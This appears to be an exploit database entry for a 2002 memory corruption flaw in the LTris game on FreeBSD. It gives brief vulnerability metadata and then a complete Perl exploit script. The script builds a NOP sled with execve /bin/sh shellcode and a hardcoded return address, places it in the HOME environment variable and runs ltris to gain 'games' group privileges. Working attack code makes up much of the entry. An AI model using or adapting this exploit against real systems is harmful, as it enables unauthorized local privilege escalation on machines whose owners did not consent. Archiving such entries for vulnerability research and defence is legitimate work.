LTris Memory Corruption Vulnerability

vendor:

LTris

by:

zillionATsafemode.org

7.2

CVSS

HIGH

Memory Corruption

119

CWE

Product Name: LTris

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: FreeBSD

2002

LTris Memory Corruption Vulnerability

A memory corruption vulnerability has been reported for LTris that may result in a local attacker obtaining group 'games' privileges. The exploit code is written in Perl and contains a shellcode that is 520 bytes long. The exploit code sets the environment variable 'HOME' to the buffer containing the shellcode and executes the vulnerable application 'ltris'.

Mitigation:

No known mitigation or remediation is available for this vulnerability.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7537/info

A memory corruption vulnerability has been reported for LTris that may result in a local attacker obtaining group 'games' privileges. 

#!/usr/bin/perl
$len = 520;
$ret = 0xbfbff825;
$nop = "\x90";
$offset = 0;
$shellcode =    "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56". #freebsd 29 bytes
                "\xb0\x3b\x50\xcd\x80\xe8\xed\xff\xff\xff\x2f". #execve /bin/sh
                "\x62\x69\x6e\x2f\x73\x68\x23";                 #zillionATsafemode.org

if (@ARGV == 1) {
    $offset = $ARGV[0];
}
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;
print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");
$new_ret = pack('l', ($ret + $offset));

for ($i += length($shellcode); $i < $len; $i += 4) {
    $buffer .= $new_ret;
}
local($ENV{'HOME'}) = $buffer; 
exec("ltris 2>/dev/null");